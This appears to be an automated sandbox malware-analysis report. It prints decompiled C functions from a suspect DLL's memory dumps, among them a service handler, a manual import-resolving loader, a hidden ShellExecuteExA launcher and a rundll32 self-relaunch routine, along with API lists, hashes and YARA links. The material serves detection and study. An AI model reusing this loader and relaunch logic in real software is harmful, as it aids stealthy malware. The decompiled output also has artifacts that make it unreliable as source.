				 *0x6f340454 = 0;
				__imp__RegisterServiceCtrlHandlerExW( *_t27, E6F333A70, 0, _t23, _t26);
				 *0x6f340394 = _t10;
				if(_t10 == 0) {
					 *0x6f340440 = 1;
					SetServiceStatus(0, 0x6f34043c);
					ExitProcess(0);
				}
				_t21 = _v8;
				 *0x6f340440 = 4;
				_t30 = _t21 - 1;
				if(_t30 <= 0) {
					L7:
					_t13 = HeapAlloc(GetProcessHeap(), 8, 4);
					if(_t13 != 0) {
						_t22 = M6F3404E8; // 0x1
						 *_t13 = _t22;
						CloseHandle(CreateThread(0, 0, E6F333930, _t13, 0, 0));
					}
					L9:
					_v4 = 0x6f34043c;
					_t14 =  *0x6f340394; // 0x0
					_v8 = _t14;
					return SetServiceStatus(??, ??);
				}
				_t18 = 1;
				if(_t30 <= 0) {
					goto L7;
				} else {
					while(1) {
						_t20 =  *((intOrPtr*)(_t27 + _t18 * 4));
						if( *_t20 == 0x73 &&  *((intOrPtr*)(_t20 + 2)) == 0) {
							goto L9;
						}
						_t18 = _t18 + 1;
						if(_t18 < _t21) {
							continue;
						}
						goto L7;
					}
					goto L9;
				}
			}

















                                                                                                                        0x6f333b60
                                                                                                                        0x6f333b68
                                                                                                                        0x6f333b6e
                                                                                                                        0x6f333b75
                                                                                                                        0x6f333b7f
                                                                                                                        0x6f333b89
                                                                                                                        0x6f333b93
                                                                                                                        0x6f333b99
                                                                                                                        0x6f333b9f
                                                                                                                        0x6f333ba5
                                                                                                                        0x6f333bb3
                                                                                                                        0x6f333bb9
                                                                                                                        0x6f333bc0
                                                                                                                        0x6f333c47
                                                                                                                        0x6f333c51
                                                                                                                        0x6f333c58
                                                                                                                        0x6f333c58
                                                                                                                        0x6f333bc2
                                                                                                                        0x6f333bc6
                                                                                                                        0x6f333bd0
                                                                                                                        0x6f333bd3
                                                                                                                        0x6f333bf4
                                                                                                                        0x6f333bff
                                                                                                                        0x6f333c07
                                                                                                                        0x6f333c09
                                                                                                                        0x6f333c19
                                                                                                                        0x6f333c22
                                                                                                                        0x6f333c22
                                                                                                                        0x6f333c28
                                                                                                                        0x6f333c2a
                                                                                                                        0x6f333c32
                                                                                                                        0x6f333c37
                                                                                                                        0x6f333c3b
                                                                                                                        0x6f333c3b
                                                                                                                        0x6f333bd5
                                                                                                                        0x6f333bd8
                                                                                                                        0x00000000
                                                                                                                        0x6f333be0
                                                                                                                        0x6f333be0
                                                                                                                        0x6f333be0
                                                                                                                        0x6f333be7
                                                                                                                        0x00000000
                                                                                                                        0x00000000
                                                                                                                        0x6f333bef
                                                                                                                        0x6f333bf2
                                                                                                                        0x00000000
                                                                                                                        0x00000000
                                                                                                                        0x00000000
                                                                                                                        0x6f333bf2
                                                                                                                        0x00000000
                                                                                                                        0x6f333be0

                                                                                                                        APIs
                                                                                                                        • SetCurrentDirectoryA.KERNEL32(009953A0), ref: 6F333B68
                                                                                                                        • RegisterServiceCtrlHandlerExW.ADVAPI32(?,6F333A70,00000000), ref: 6F333BB3
                                                                                                                        • GetProcessHeap.KERNEL32(00000008,00000004,?,6F333A70,00000000), ref: 6F333BF8
                                                                                                                        • HeapAlloc.KERNEL32(00000000,?,6F333A70,00000000), ref: 6F333BFF
                                                                                                                        • CreateThread.KERNEL32 ref: 6F333C1B
                                                                                                                        • CloseHandle.KERNEL32(00000000,?,6F333A70,00000000), ref: 6F333C22
                                                                                                                        • SetServiceStatus.ADVAPI32(00000000,6F34043C,?,6F333A70,00000000), ref: 6F333C51
                                                                                                                        • ExitProcess.KERNEL32 ref: 6F333C58
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000002.00000002.410946846.000000006F331000.00000020.00020000.sdmp, Offset: 6F330000, based on PE: true
                                                                                                                        • Associated: 00000002.00000002.410929497.000000006F330000.00000002.00020000.sdmp Download File
                                                                                                                        • Associated: 00000002.00000002.410968304.000000006F33D000.00000002.00020000.sdmp Download File
                                                                                                                        • Associated: 00000002.00000002.411025550.000000006F340000.00000004.00020000.sdmp Download File
                                                                                                                        • Associated: 00000002.00000002.411060259.000000006F341000.00000002.00020000.sdmp Download File
                                                                                                                        Similarity
                                                                                                                        • API ID: HeapProcessService$AllocCloseCreateCtrlCurrentDirectoryExitHandleHandlerRegisterStatusThread
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 2085172483-0
                                                                                                                        • Opcode ID: 56cbdfa558f69dca54de98f1c3b66dfcbbc10ae8b0920435d1bc4e9e75a7721a
                                                                                                                        • Instruction ID: 4e0bf0015c270c5cdf686b2fdccda863b4e9eed7adce4186e8579dfcc027ec46
                                                                                                                        • Opcode Fuzzy Hash: 56cbdfa558f69dca54de98f1c3b66dfcbbc10ae8b0920435d1bc4e9e75a7721a
                                                                                                                        • Instruction Fuzzy Hash: D22171B2A00A90EFCB20EF65C449A06BBBEFBE6724F50950EE54587310CB75A069CF11
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        Function 6F331720, Relevance: 10.6, APIs: 7, Instructions: 138memorylibraryloaderCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        C-Code - Quality: 100%
                                                                                                                        			E6F331720(void* __edi) {
				struct HINSTANCE__* _v4;
				intOrPtr* _v8;
				intOrPtr _t40;
				intOrPtr _t42;
				struct HINSTANCE__* _t44;
				signed int _t46;
				intOrPtr _t47;
				signed short _t48;
				CHAR* _t49;
				_Unknown_base(*)()* _t51;
				signed int _t53;
				signed int _t54;
				signed int _t55;
				signed int _t59;
				void* _t60;
				intOrPtr* _t67;
				signed short* _t70;
				intOrPtr _t75;
				intOrPtr* _t78;
				void* _t83;
				signed short* _t88;
				void* _t94;
				signed short _t114;

				_t83 = __edi;
				_t40 =  *((intOrPtr*)(__edi + 0xc0));
				if(_t40 == 0 ||  *((intOrPtr*)(__edi + 0xc4)) == 0) {
					return 0;
				} else {
					_t67 =  *((intOrPtr*)(__edi + 0x144)) + _t40;
					_t42 =  *((intOrPtr*)(_t67 + 0xc));
					_v8 = _t67;
					if(_t42 == 0) {
						L30:
						return 0;
					} else {
						_t94 = _v4;
						while(1) {
							_t44 = LoadLibraryA( *((intOrPtr*)(_t83 + 0x144)) + _t42);
							_v4 = _t44;
							if(_t44 == 0) {
								break;
							}
							_t46 =  *(_t83 + 0x154);
							if( *(_t83 + 0x150) < _t46) {
								L16:
								if(_t94 != 0) {
									_t53 =  *(_t83 + 0x150);
									_t54 = _t53 + 1;
									 *(_t83 + 0x150) = _t54;
									if( *((intOrPtr*)(_t94 + _t53 * 4)) != 0) {
										 *((intOrPtr*)(_t94 + _t54 * 4)) = _v4;
										 *(_t83 + 0x150) =  *(_t83 + 0x150) + 1;
									}
								}
								_t47 =  *((intOrPtr*)(_t83 + 0x144));
								_t78 = _v8;
								_t88 =  *((intOrPtr*)(_t67 + 0x10)) + _t47;
								_t70 = _t88;
								if( *((intOrPtr*)(_t78 + 4)) == 0) {
									L22:
									_t48 =  *_t70;
									_t114 = _t48;
									if(_t114 == 0) {
										L29:
										_t42 =  *((intOrPtr*)(_t78 + 0x20));
										_v8 = _t78 + 0x14;
										if(_t42 != 0) {
											_t67 = _v8;
											continue;
										} else {
											goto L30;
										}
									} else {
										L23:
										L23:
										if(_t114 >= 0) {
											_t49 = _t48 +  *((intOrPtr*)(_t83 + 0x144)) + 2;
										} else {
											_t49 = _t48 & 0x0000ffff;
										}
										_t51 = GetProcAddress(_v4, _t49);
										 *_t88 = _t51;
										if(_t51 == 0) {
											break;
										}
										_t48 = _t70[2];
										_t70 =  &(_t70[2]);
										_t88 =  &(_t88[2]);
										if(_t48 != 0) {
											goto L23;
										} else {
											_t78 = _v8;
											goto L29;
										}
									}
								} else {
									_t75 =  *_t78;
									if(_t75 == 0) {
										return 8;
									} else {
										_t70 = _t75 + _t47;
										goto L22;
									}
								}
							} else {
								if(_t46 == 0) {
									_t55 = 0x10;
								} else {
									_t55 = _t46 + _t46;
								}
								 *(_t83 + 0x154) = _t55;
								_t94 = HeapAlloc(GetProcessHeap(), 8, _t55 * 4);
								if(_t94 == 0) {
									return 3;
								} else {
									_t59 =  *(_t83 + 0x150);
									if(_t59 != 0) {
										RtlMoveMemory(_t94,  *(_t83 + 0x14c), _t59 + _t59 + _t59 + _t59);
									}
									_t60 =  *(_t83 + 0x14c);
									if(_t60 != 0) {
										HeapFree(GetProcessHeap(), 0, _t60);
									}
									 *(_t83 + 0x14c) = _t94;
									goto L16;
								}
							}
							goto L35;
						}
						return 6;
					}
				}
				L35:
			}


























                                                                                                                        0x6f331720
                                                                                                                        0x6f331720
                                                                                                                        0x6f33172b
                                                                                                                        0x6f3318c0
                                                                                                                        0x6f33173e
                                                                                                                        0x6f331745
                                                                                                                        0x6f331747
                                                                                                                        0x6f33174c
                                                                                                                        0x6f331752
                                                                                                                        0x6f33188e
                                                                                                                        0x6f331896
                                                                                                                        0x6f331758
                                                                                                                        0x6f331758
                                                                                                                        0x6f331764
                                                                                                                        0x6f33176d
                                                                                                                        0x6f331773
                                                                                                                        0x6f331779
                                                                                                                        0x00000000
                                                                                                                        0x00000000
                                                                                                                        0x6f33177f
                                                                                                                        0x6f33178b
                                                                                                                        0x6f3317fb
                                                                                                                        0x6f3317fd
                                                                                                                        0x6f3317ff
                                                                                                                        0x6f331809
                                                                                                                        0x6f33180a
                                                                                                                        0x6f331812
                                                                                                                        0x6f331818
                                                                                                                        0x6f33181c
                                                                                                                        0x6f33181c
                                                                                                                        0x6f331812
                                                                                                                        0x6f331825
                                                                                                                        0x6f33182b
                                                                                                                        0x6f33182f
                                                                                                                        0x6f331835
                                                                                                                        0x6f331837
                                                                                                                        0x6f331842
                                                                                                                        0x6f331842
                                                                                                                        0x6f331844
                                                                                                                        0x6f331846
                                                                                                                        0x6f33187c
                                                                                                                        0x6f33187c
                                                                                                                        0x6f331882
                                                                                                                        0x6f331888
                                                                                                                        0x6f331760
                                                                                                                        0x00000000
                                                                                                                        0x00000000
                                                                                                                        0x00000000
                                                                                                                        0x00000000
                                                                                                                        0x6f331848
                                                                                                                        0x00000000
                                                                                                                        0x6f331848
                                                                                                                        0x6f331848
                                                                                                                        0x6f331855
                                                                                                                        0x6f33184a
                                                                                                                        0x6f33184a
                                                                                                                        0x6f33184a
                                                                                                                        0x6f33185f
                                                                                                                        0x6f331865
                                                                                                                        0x6f331869
                                                                                                                        0x00000000
                                                                                                                        0x00000000
                                                                                                                        0x6f33186b
                                                                                                                        0x6f33186e
                                                                                                                        0x6f331871
                                                                                                                        0x6f331876
                                                                                                                        0x00000000
                                                                                                                        0x6f331878
                                                                                                                        0x6f331878
                                                                                                                        0x00000000
                                                                                                                        0x6f331878
                                                                                                                        0x6f331876
                                                                                                                        0x6f331839
                                                                                                                        0x6f331839
                                                                                                                        0x6f33183d
                                                                                                                        0x6f3318ae
                                                                                                                        0x6f33183f
                                                                                                                        0x6f33183f
                                                                                                                        0x00000000
                                                                                                                        0x6f33183f
                                                                                                                        0x6f33183d
                                                                                                                        0x6f33178d
                                                                                                                        0x6f33178f
                                                                                                                        0x6f331795
                                                                                                                        0x6f331791
                                                                                                                        0x6f331791
                                                                                                                        0x6f331791
                                                                                                                        0x6f3317aa
                                                                                                                        0x6f3317b9
                                                                                                                        0x6f3317bd
                                                                                                                        0x6f3318a2
                                                                                                                        0x6f3317c3
                                                                                                                        0x6f3317c3
                                                                                                                        0x6f3317cb
                                                                                                                        0x6f3317da
                                                                                                                        0x6f3317da
                                                                                                                        0x6f3317df
                                                                                                                        0x6f3317e7
                                                                                                                        0x6f3317ef
                                                                                                                        0x6f3317ef
                                                                                                                        0x6f3317f5
                                                                                                                        0x00000000
                                                                                                                        0x6f3317f5
                                                                                                                        0x6f3317bd
                                                                                                                        0x00000000
                                                                                                                        0x6f33178b
                                                                                                                        0x6f3318ba
                                                                                                                        0x6f3318ba
                                                                                                                        0x6f331752
                                                                                                                        0x00000000

                                                                                                                        APIs
                                                                                                                        • LoadLibraryA.KERNEL32(?), ref: 6F33176D
                                                                                                                        • GetProcessHeap.KERNEL32(00000008), ref: 6F3317B0
                                                                                                                        • HeapAlloc.KERNEL32(00000000), ref: 6F3317B3
                                                                                                                        • RtlMoveMemory.NTDLL(00000000,?,?), ref: 6F3317DA
                                                                                                                        • GetProcessHeap.KERNEL32(00000000,?), ref: 6F3317EC
                                                                                                                        • HeapFree.KERNEL32(00000000), ref: 6F3317EF
                                                                                                                        • GetProcAddress.KERNEL32(?,?), ref: 6F33185F
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000002.00000002.410946846.000000006F331000.00000020.00020000.sdmp, Offset: 6F330000, based on PE: true
                                                                                                                        • Associated: 00000002.00000002.410929497.000000006F330000.00000002.00020000.sdmp Download File
                                                                                                                        • Associated: 00000002.00000002.410968304.000000006F33D000.00000002.00020000.sdmp Download File
                                                                                                                        • Associated: 00000002.00000002.411025550.000000006F340000.00000004.00020000.sdmp Download File
                                                                                                                        • Associated: 00000002.00000002.411060259.000000006F341000.00000002.00020000.sdmp Download File
                                                                                                                        Similarity
                                                                                                                        • API ID: Heap$Process$AddressAllocFreeLibraryLoadMemoryMoveProc
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 2239585089-0
                                                                                                                        • Opcode ID: 7b2e3cdfbba2c410e3b28f0084f4e3715afce06fa7edaab036c5e0ed8c34dfc8
                                                                                                                        • Instruction ID: ea0467e0b8c6b71df47d3204a102e90d60006ee14d2fb1e978779f0e02a6d6fc
                                                                                                                        • Opcode Fuzzy Hash: 7b2e3cdfbba2c410e3b28f0084f4e3715afce06fa7edaab036c5e0ed8c34dfc8
                                                                                                                        • Instruction Fuzzy Hash: 02416076F007569BEB14EF68D8447A6B7A9FF44315F04862AE828CB341E735F814CBA0
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        Function 6F33175E, Relevance: 10.6, APIs: 7, Instructions: 98memorylibraryloaderCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        C-Code - Quality: 100%
                                                                                                                        			E6F33175E(intOrPtr __eax, void* __edi, intOrPtr* _a12, struct HINSTANCE__* _a16) {
				intOrPtr _t34;
				struct HINSTANCE__* _t35;
				signed int _t37;
				intOrPtr _t38;
				signed short _t39;
				CHAR* _t41;
				_Unknown_base(*)()* _t43;
				signed int _t45;
				signed int _t46;
				signed int _t47;
				signed int _t51;
				void* _t52;
				intOrPtr* _t57;
				signed short* _t59;
				intOrPtr _t65;
				intOrPtr* _t68;
				void* _t73;
				signed short* _t76;
				void* _t81;
				signed short _t103;

				_t73 = __edi;
				_t34 = __eax;
				while(1) {
					_t57 = _a12;
					_t35 = LoadLibraryA( *((intOrPtr*)(_t73 + 0x144)) + _t34);
					_a16 = _t35;
					if(_t35 == 0) {
						break;
					}
					_t37 =  *(_t73 + 0x154);
					if( *(_t73 + 0x150) < _t37) {
						L13:
						if(_t81 != 0) {
							_t45 =  *(_t73 + 0x150);
							_t46 = _t45 + 1;
							 *(_t73 + 0x150) = _t46;
							if( *((intOrPtr*)(_t81 + _t45 * 4)) != 0) {
								 *((intOrPtr*)(_t81 + _t46 * 4)) = _a16;
								 *(_t73 + 0x150) =  *(_t73 + 0x150) + 1;
							}
						}
						_t38 =  *((intOrPtr*)(_t73 + 0x144));
						_t68 = _a12;
						_t76 =  *((intOrPtr*)(_t57 + 0x10)) + _t38;
						_t59 = _t76;
						if( *((intOrPtr*)(_t68 + 4)) == 0) {
							L19:
							_t39 =  *_t59;
							_t103 = _t39;
							if(_t103 == 0) {
								L26:
								_t34 =  *((intOrPtr*)(_t68 + 0x20));
								_a12 = _t68 + 0x14;
								if(_t34 != 0) {
									continue;
								} else {
									return 0;
								}
							} else {
								L20:
								L20:
								if(_t103 >= 0) {
									_t41 = _t39 +  *((intOrPtr*)(_t73 + 0x144)) + 2;
								} else {
									_t41 = _t39 & 0x0000ffff;
								}
								_t43 = GetProcAddress(_a16, _t41);
								 *_t76 = _t43;
								if(_t43 == 0) {
									break;
								}
								_t39 = _t59[2];
								_t59 =  &(_t59[2]);
								_t76 =  &(_t76[2]);
								if(_t39 != 0) {
									goto L20;
								} else {
									_t68 = _a12;
									goto L26;
								}
							}
						} else {
							_t65 =  *_t68;
							if(_t65 == 0) {
								return 8;
							} else {
								_t59 = _t65 + _t38;
								goto L19;
							}
						}
					} else {
						if(_t37 == 0) {
							_t47 = 0x10;
						} else {
							_t47 = _t37 + _t37;
						}
						 *(_t73 + 0x154) = _t47;
						_t81 = HeapAlloc(GetProcessHeap(), 8, _t47 * 4);
						if(_t81 == 0) {
							return 3;
						} else {
							_t51 =  *(_t73 + 0x150);
							if(_t51 != 0) {
								RtlMoveMemory(_t81,  *(_t73 + 0x14c), _t51 + _t51 + _t51 + _t51);
							}
							_t52 =  *(_t73 + 0x14c);
							if(_t52 != 0) {
								HeapFree(GetProcessHeap(), 0, _t52);
							}
							 *(_t73 + 0x14c) = _t81;
							goto L13;
						}
					}
					L31:
				}
				return 6;
				goto L31;
			}























                                                                                                                        0x6f33175e
                                                                                                                        0x6f33175e
                                                                                                                        0x6f331760
                                                                                                                        0x6f331760
                                                                                                                        0x6f33176d
                                                                                                                        0x6f331773
                                                                                                                        0x6f331779
                                                                                                                        0x00000000
                                                                                                                        0x00000000
                                                                                                                        0x6f33177f
                                                                                                                        0x6f33178b
                                                                                                                        0x6f3317fb
                                                                                                                        0x6f3317fd
                                                                                                                        0x6f3317ff
                                                                                                                        0x6f331809
                                                                                                                        0x6f33180a
                                                                                                                        0x6f331812
                                                                                                                        0x6f331818
                                                                                                                        0x6f33181c
                                                                                                                        0x6f33181c
                                                                                                                        0x6f331812
                                                                                                                        0x6f331825
                                                                                                                        0x6f33182b
                                                                                                                        0x6f33182f
                                                                                                                        0x6f331835
                                                                                                                        0x6f331837
                                                                                                                        0x6f331842
                                                                                                                        0x6f331842
                                                                                                                        0x6f331844
                                                                                                                        0x6f331846
                                                                                                                        0x6f33187c
                                                                                                                        0x6f33187c
                                                                                                                        0x6f331882
                                                                                                                        0x6f331888
                                                                                                                        0x00000000
                                                                                                                        0x6f33188e
                                                                                                                        0x6f331896
                                                                                                                        0x6f331896
                                                                                                                        0x6f331848
                                                                                                                        0x00000000
                                                                                                                        0x6f331848
                                                                                                                        0x6f331848
                                                                                                                        0x6f331855
                                                                                                                        0x6f33184a
                                                                                                                        0x6f33184a
                                                                                                                        0x6f33184a
                                                                                                                        0x6f33185f
                                                                                                                        0x6f331865
                                                                                                                        0x6f331869
                                                                                                                        0x00000000
                                                                                                                        0x00000000
                                                                                                                        0x6f33186b
                                                                                                                        0x6f33186e
                                                                                                                        0x6f331871
                                                                                                                        0x6f331876
                                                                                                                        0x00000000
                                                                                                                        0x6f331878
                                                                                                                        0x6f331878
                                                                                                                        0x00000000
                                                                                                                        0x6f331878
                                                                                                                        0x6f331876
                                                                                                                        0x6f331839
                                                                                                                        0x6f331839
                                                                                                                        0x6f33183d
                                                                                                                        0x6f3318ae
                                                                                                                        0x6f33183f
                                                                                                                        0x6f33183f
                                                                                                                        0x00000000
                                                                                                                        0x6f33183f
                                                                                                                        0x6f33183d
                                                                                                                        0x6f33178d
                                                                                                                        0x6f33178f
                                                                                                                        0x6f331795
                                                                                                                        0x6f331791
                                                                                                                        0x6f331791
                                                                                                                        0x6f331791
                                                                                                                        0x6f3317aa
                                                                                                                        0x6f3317b9
                                                                                                                        0x6f3317bd
                                                                                                                        0x6f3318a2
                                                                                                                        0x6f3317c3
                                                                                                                        0x6f3317c3
                                                                                                                        0x6f3317cb
                                                                                                                        0x6f3317da
                                                                                                                        0x6f3317da
                                                                                                                        0x6f3317df
                                                                                                                        0x6f3317e7
                                                                                                                        0x6f3317ef
                                                                                                                        0x6f3317ef
                                                                                                                        0x6f3317f5
                                                                                                                        0x00000000
                                                                                                                        0x6f3317f5
                                                                                                                        0x6f3317bd
                                                                                                                        0x00000000
                                                                                                                        0x6f33178b
                                                                                                                        0x6f3318ba
                                                                                                                        0x00000000

                                                                                                                        APIs
                                                                                                                        • LoadLibraryA.KERNEL32(?), ref: 6F33176D
                                                                                                                        • GetProcessHeap.KERNEL32(00000008), ref: 6F3317B0
                                                                                                                        • HeapAlloc.KERNEL32(00000000), ref: 6F3317B3
                                                                                                                        • RtlMoveMemory.NTDLL(00000000,?,?), ref: 6F3317DA
                                                                                                                        • GetProcessHeap.KERNEL32(00000000,?), ref: 6F3317EC
                                                                                                                        • HeapFree.KERNEL32(00000000), ref: 6F3317EF
                                                                                                                        • GetProcAddress.KERNEL32(?,?), ref: 6F33185F
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000002.00000002.410946846.000000006F331000.00000020.00020000.sdmp, Offset: 6F330000, based on PE: true
                                                                                                                        • Associated: 00000002.00000002.410929497.000000006F330000.00000002.00020000.sdmp Download File
                                                                                                                        • Associated: 00000002.00000002.410968304.000000006F33D000.00000002.00020000.sdmp Download File
                                                                                                                        • Associated: 00000002.00000002.411025550.000000006F340000.00000004.00020000.sdmp Download File
                                                                                                                        • Associated: 00000002.00000002.411060259.000000006F341000.00000002.00020000.sdmp Download File
                                                                                                                        Similarity
                                                                                                                        • API ID: Heap$Process$AddressAllocFreeLibraryLoadMemoryMoveProc
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 2239585089-0
                                                                                                                        • Opcode ID: db9839d13b1418abeecf09bdf88284fc3d6eefcaade1963ca226438f7356772e
                                                                                                                        • Instruction ID: d48dca3991ae4241c46d5425f78c2810b2c10174371ae7538861a01c2598590e
                                                                                                                        • Opcode Fuzzy Hash: db9839d13b1418abeecf09bdf88284fc3d6eefcaade1963ca226438f7356772e
                                                                                                                        • Instruction Fuzzy Hash: E0315E76F007969BE704EF68D8447A6B7A9FF48355F048629E829CB301EB31F811CB90
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        Function 6F334230, Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 63synchronizationCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        C-Code - Quality: 92%
                                                                                                                        			E6F334230(intOrPtr _a4, intOrPtr _a8, DWORD* _a12) {
				intOrPtr _v0;
				intOrPtr _v4;
				struct _SHELLEXECUTEINFOA _v68;
				intOrPtr _t22;
				intOrPtr _t23;
				intOrPtr _t24;
				int _t25;
				DWORD* _t27;
				int _t35;
				signed int _t38;
				long _t40;

				_push(0x3c);
				_push( &(_v68.hwnd));
				L6F33C2EE();
				_t22 = _v0;
				_v68.cbSize = 0x3c;
				_v68.fMask = 0x800400;
				_v68.nShow = 0;
				if(_t22 != 0) {
					_v68.lpFile = _t22;
				}
				_t23 = _a4;
				if(_t23 != 0) {
					_v68.lpParameters = _t23;
				}
				_t24 = _v4;
				if(_t24 != 0) {
					_v68.lpVerb = _t24;
				}
				if(_a8 == 0) {
					_v68.fMask = 0x808400;
				} else {
					_v68.nShow = 1;
				}
				_t38 = _a12;
				if(_t38 != 0) {
					_v68.fMask = _v68.fMask | 0x00000040;
				}
				_t25 = ShellExecuteExA( &_v68);
				_t35 = _t25;
				if(_t35 != 0 && _t38 != 0) {
					if(_t38 == 0xffffffff) {
						_t40 = _t38 | 0xffffffff;
					} else {
						_t40 = _t38 * 0x3e8;
					}
					WaitForSingleObject(_v68.hIcon, _t40);
					_t27 = _a12;
					if(_t27 != 0) {
						GetExitCodeProcess(_v68.hIcon, _t27);
					}
					CloseHandle(_v68.hIcon);
					_t25 = _t35;
				}
				return _t25;
			}














                                                                                                                        0x6f334233
                                                                                                                        0x6f334239
                                                                                                                        0x6f33423a
                                                                                                                        0x6f33423f
                                                                                                                        0x6f334243
                                                                                                                        0x6f33424a
                                                                                                                        0x6f334252
                                                                                                                        0x6f33425c
                                                                                                                        0x6f33425e
                                                                                                                        0x6f33425e
                                                                                                                        0x6f334262
                                                                                                                        0x6f334268
                                                                                                                        0x6f33426a
                                                                                                                        0x6f33426a
                                                                                                                        0x6f33426e
                                                                                                                        0x6f334274
                                                                                                                        0x6f334276
                                                                                                                        0x6f334276
                                                                                                                        0x6f33427f
                                                                                                                        0x6f33428b
                                                                                                                        0x6f334281
                                                                                                                        0x6f334281
                                                                                                                        0x6f334281
                                                                                                                        0x6f334294
                                                                                                                        0x6f33429b
                                                                                                                        0x6f33429d
                                                                                                                        0x6f33429d
                                                                                                                        0x6f3342a7
                                                                                                                        0x6f3342ad
                                                                                                                        0x6f3342b1
                                                                                                                        0x6f3342ba
                                                                                                                        0x6f3342c4
                                                                                                                        0x6f3342bc
                                                                                                                        0x6f3342bc
                                                                                                                        0x6f3342bc
                                                                                                                        0x6f3342cd
                                                                                                                        0x6f3342d3
                                                                                                                        0x6f3342d9
                                                                                                                        0x6f3342e1
                                                                                                                        0x6f3342e1
                                                                                                                        0x6f3342ec
                                                                                                                        0x6f3342f2
                                                                                                                        0x6f3342f2
                                                                                                                        0x6f3342f9

                                                                                                                        APIs
                                                                                                                        • RtlZeroMemory.NTDLL(0000003C,0000003C), ref: 6F33423A
                                                                                                                        • ShellExecuteExA.SHELL32(0000003C,00000000,00000000), ref: 6F3342A7
                                                                                                                        • WaitForSingleObject.KERNEL32(?,?), ref: 6F3342CD
                                                                                                                        • GetExitCodeProcess.KERNEL32 ref: 6F3342E1
                                                                                                                        • CloseHandle.KERNEL32(?), ref: 6F3342EC
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000002.00000002.410946846.000000006F331000.00000020.00020000.sdmp, Offset: 6F330000, based on PE: true
                                                                                                                        • Associated: 00000002.00000002.410929497.000000006F330000.00000002.00020000.sdmp Download File
                                                                                                                        • Associated: 00000002.00000002.410968304.000000006F33D000.00000002.00020000.sdmp Download File
                                                                                                                        • Associated: 00000002.00000002.411025550.000000006F340000.00000004.00020000.sdmp Download File
                                                                                                                        • Associated: 00000002.00000002.411060259.000000006F341000.00000002.00020000.sdmp Download File
                                                                                                                        Similarity
                                                                                                                        • API ID: CloseCodeExecuteExitHandleMemoryObjectProcessShellSingleWaitZero
                                                                                                                        • String ID: @
                                                                                                                        • API String ID: 1639083440-2766056989
                                                                                                                        • Opcode ID: 93814b0b1793294fe0fe26721a22d68b433e192926ed57a498fa880293b5a424
                                                                                                                        • Instruction ID: 9fd273de62ff93ce936e8f54bf83aa43079eeafee47608e2d9efb4b00d4676af
                                                                                                                        • Opcode Fuzzy Hash: 93814b0b1793294fe0fe26721a22d68b433e192926ed57a498fa880293b5a424
                                                                                                                        • Instruction Fuzzy Hash: AC216F729097A19BD710CF69C544B5BBBE8BB89710F008A1EF9A4E3280D777D804CF52
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        Function 6F335190, Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 50COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        C-Code - Quality: 70%
                                                                                                                        			E6F335190(intOrPtr _a4) {
				char _v772;
				char _v780;
				void* _t4;
				char* _t5;
				char _t6;
				intOrPtr _t11;
				CHAR* _t14;

				_t11 = _a4;
				if(_t11 != 0x65 ||  *0x6f34027c >= 6 && M6F340544 == 0 && M6F340548 != 0) {
					_t4 = OpenEventA(2, 0, "TVRF_Instance");
					if(_t4 == 0) {
						_t5 = M6F340530; // 0x997378
						_t14 = M6F340524; // 0x9954b0
						_t6 = "on=\"1.0\">\r\n  <trustInfo xmlns=\"urn:schemas-microsoft-com:asm.v3\">\r\n    <security>\r\n      <requestedPrivileges>\r\n        <requestedExecutionLevel level=\"asInvoker\" uiAccess=\"false\"></requestedExecutionLevel>\r\n      </requestedPrivileges>\r\n    </security>\r\n  </trustInfo>\r\n</assembly>PA<?xml version=\"1.0\" encoding=\"UTF-8\" standalone=\"yes\"?>\r\n<assembly xmlns=\"urn:schemas-microsoft-com:asm.v1\" manifestVersion=\"1.0\">\r\n  <trustInfo xmlns=\"urn:schemas-microsoft-com:asm.v3\">\r\n    <security>\r\n      <requestedPrivileges>\r\n        <requestedExecutionLevel level=\"asInvoker\" uiAccess=\"false\"></requestedExecutionLevel>\r\n      </requestedPrivileges>\r\n    </security>\r\n  </trustInfo>\r\n<assemblyIdentity type=\"win32\" name=\"Microsoft.Windows.Common-Controls\" version=\"6.0.0.0\" processorArchitecture=\"x86\" />\r\n<dependency>\r\n    <dependentAssembly>\r\n        <assemblyIdentity\r\n            type=\"win32\"\r\n            name=\"Microsoft.Windows.Common-Controls\"\r\n            version=\"6.0.0.0\"\r\n            processorArchitecture=\"x86\"\r\n            publicKeyToken=\"6595b64144ccf1df\"\r\n            language=\"*\"\r\n        />\r\n    </dependentAssembly>\r\n</dependency>\r\n</assembly>PAD"; // 0x996628
						wsprintfA( &_v780, "\"%s%s\" \"%s\",#%d %c \"%s\"", _t6, "rundll32.exe", _t14, 0x195, _t11, _t5);
						_push(0);
						_push(0);
						_push(0);
						_push(0);
						return E6F334EF0( &_v772, 1, 0);
					} else {
						CloseHandle(_t4);
						goto L6;
					}
				} else {
					L6:
					return 0;
				}
			}










                                                                                                                        0x6f335197
                                                                                                                        0x6f3351a1
                                                                                                                        0x6f3351c7
                                                                                                                        0x6f3351cf
                                                                                                                        0x6f3351e2
                                                                                                                        0x6f3351e7
                                                                                                                        0x6f3351ee
                                                                                                                        0x6f33520d
                                                                                                                        0x6f335213
                                                                                                                        0x6f335215
                                                                                                                        0x6f335217
                                                                                                                        0x6f335219
                                                                                                                        0x6f335233
                                                                                                                        0x6f3351d1
                                                                                                                        0x6f3351d2
                                                                                                                        0x00000000
                                                                                                                        0x6f3351d2
                                                                                                                        0x6f3351d8
                                                                                                                        0x6f3351d8
                                                                                                                        0x6f3351e1
                                                                                                                        0x6f3351e1

                                                                                                                        APIs
